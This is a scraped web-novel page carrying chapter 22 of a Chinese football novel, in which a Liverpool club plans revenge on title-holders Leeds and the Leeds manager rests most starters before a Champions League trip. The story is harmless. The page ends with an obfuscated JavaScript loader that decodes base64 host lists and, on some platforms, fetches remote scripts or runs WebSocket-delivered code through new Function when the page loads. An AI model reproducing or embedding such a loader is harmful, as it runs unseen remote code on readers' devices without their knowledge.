笔趣阁

字:
关灯 护眼
笔趣阁 > 禁区之狐 > 第二十二章 欧冠前的联赛

第二十二章 欧冠前的联赛

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
胡莱回到利兹之后,联赛中就迎来了一个强大的对手——斯坦公园巡游者。
  
  上赛季利兹城在斯坦公园球场击败了斯坦公园巡游者,开启了激动人心的逆袭。那个赛季的夺冠征程,被许多媒体称为进入二十一世纪后英超最激动人心的一次冠军争夺战。
  
  这里面利兹城笑到最后,全球扬名。
  
  而斯坦公园巡游者则成为利兹城的背景板,被一次次鞭尸——当然,他们并不孤独,因为还有特拉梅德陪着他们一起,戏份同样重要。
  
  整个赛季的英超联赛冠军争夺完全可以浓缩成两场比赛:一场斯坦公园巡游者在主场3:4负于利兹城,一场就是特拉梅德在主场2:3输给利兹城。
  
  这两场比赛的最终结果决定了上赛季英超联赛冠军的归属。
  
  昔日的英格兰足坛世仇死敌,却同为利兹城夺冠的最佳配角,沦为难兄难弟,真是让人既好笑又唏嘘。
  
  利兹城抢了斯坦公园巡游者的冠军之后,斯坦公园巡游者就一直在期待复仇。
  
  如今他们终于等到了机会。
  
  国家队比赛刚刚结束,英格兰媒体就迅速把关注的目光从英格兰队转移到这两支球队身上。
  
  利物浦当地媒体迫不及待地喊出了“复仇”的口号。
  
  这可绝对不只是媒体们的自嗨。
  
  尽管下周中就要在主场迎战法甲冠军巴黎埃热尔,尽管刚刚打完国家队比赛,但斯坦公园巡游者主教练斯科特·布鲁克斯却还是派上了大部分主力球员,在主场迎战利兹城。
  
  从这个排兵布阵上就可以看得出来,斯坦公园巡游者球队自己是很在乎这场比赛的。
  
  其实布鲁克斯这么做是要冒一定风险的,因为接下来的欧冠小组赛,斯坦公园巡游者首轮就打这个小组里实力最强的种子球队,上届法甲联赛冠军巴黎埃热尔。
  
  作为常年都参加欧冠的豪门球队来说,斯坦公园巡游者的目标可绝对不是小组出线那么简单,而是还要争夺小组第一。
  
  既然要争夺小组第一,那主场和巴黎埃热尔的这场比赛就很重要。
  
  按理说,布鲁克斯应该战略性放弃这场联赛,集中精力打好和巴黎埃热尔的欧冠小组赛。
  
  这才是利益最大化的方式。
  
  可布鲁克斯没这么做。
  
  他的目的很明确,就是找利兹城复仇。
  
  有利兹城球迷在网上嘲讽斯坦公园巡游者的这种做法只是亡羊补牢而已:
  
  “……就算斯坦公园巡游者在这场比赛中击败了我们,又能改变什么呢?2025-2026赛季的英超联赛冠军依然属于利兹城,并且永远属于利兹城!”
  
  对于这样的言论,布鲁克斯并没有公开回应。
  
  而是在比赛前的斯坦公园球场主队更衣室里,对自己的球员们说出了他为什么这么做的理由:
  
  “……我知道有人说我们已经失去了联赛冠军,现在就算把利兹城在我们的主场揍趴下,也毫无意义。因为失去的联赛冠军并不会重新回到我们的手上……但我要说的是,我不同意这种说法。联赛冠军并不只有一个,我们在上赛季丢掉一个,就可以在接下来重新赢回来。关键是怎么才能赢回来?
  
  “我知道自从输掉联赛冠军之后,很多球员心里都憋着火和气。一定有人对于上赛季的最终结果感到不甘心……那怎么办?当然是赢回来!想要重新赢回冠军,我们就必须击败这个抢走了我们冠军的对手。否则我们就不能重新开始,这口气憋在心里吐不出来,是会出问题的!而这次,击败他们,哪怕是一支轮换阵容的利兹城,对我们来说也很重要!”
  
  和斯坦公园巡游者摆明了想要复仇不同,利兹城并不是很重视这场比赛。
  
  东尼·克拉克给出的大名单里多名主力压根儿就没从利兹来到利物浦。
  
  他们被留在利兹,充分休息以准备去客场挑战土超冠军海湾灯塔。
  
  从这个人员安排上,就能看出来利兹城对这场比赛的态度——不管媒体怎么炒作,东尼·克拉克依然按照他的节奏来备战。
  
  为了打欧冠,就放弃联赛。
  
  哪怕是一场和斯坦公园巡游者的重头戏,说放弃也放弃了。
  
  但克拉克还是把胡莱带到了斯坦公园球场来。
  
  这个安排就让人感到费解了——卡马拉和杰伊·亚当斯都没随队前来,胡莱这么一个饼锋来干什么?
  
  而且作为球队的主力射手,为了备战欧冠,不是应该在利兹好好休息,倒倒时差,准备去客场挑战海湾灯塔吗?
  
  他来利物浦干什么?
  
  难道是专门来羞辱斯坦公园巡游者球迷的?提醒他们不要忘记这可是九年来第一个在斯坦公园球场上演帽子戏法的客队球员……
  
  ※※※
  
  “我真觉得克拉克那小子带胡来我们这里,就是为了嘲讽我们的,提醒我们别忘了上赛季的那场失败……”斯坦公园巡游者助理教练史蒂芬·布朗对身边坐着的主教练斯科特·布鲁克斯说道。“要不然为什么来了之后又不让他出场,把他放在替补席上……这有什么意义吗?”
  
  “别管有没有意义了,史蒂芬。我们踢我们的,保持自己的节奏,不要受到对手的影响和干扰。”布鲁克斯撇嘴说道。
  
  此时此刻,比赛已经进行到了下半场,斯坦公园巡游者在主场2:0领先利兹城,距离比赛结束还有大约二十分钟。
  
  看上去,斯坦公园巡游者赢得这场比赛,成功复仇应该是没什么意外了。
  
  五分钟之前,布鲁克斯也开始换人调整,让主力球员下场休息,准备下周中主场迎战巴黎埃热尔。
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDA4NQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x4d\x4a\x52\x5a\x74\x53\x42\x70\x63\x77']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vYWpmMmpkajlmajI5LmJiZGlhbbnppc2h1LmNvbbQ==','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};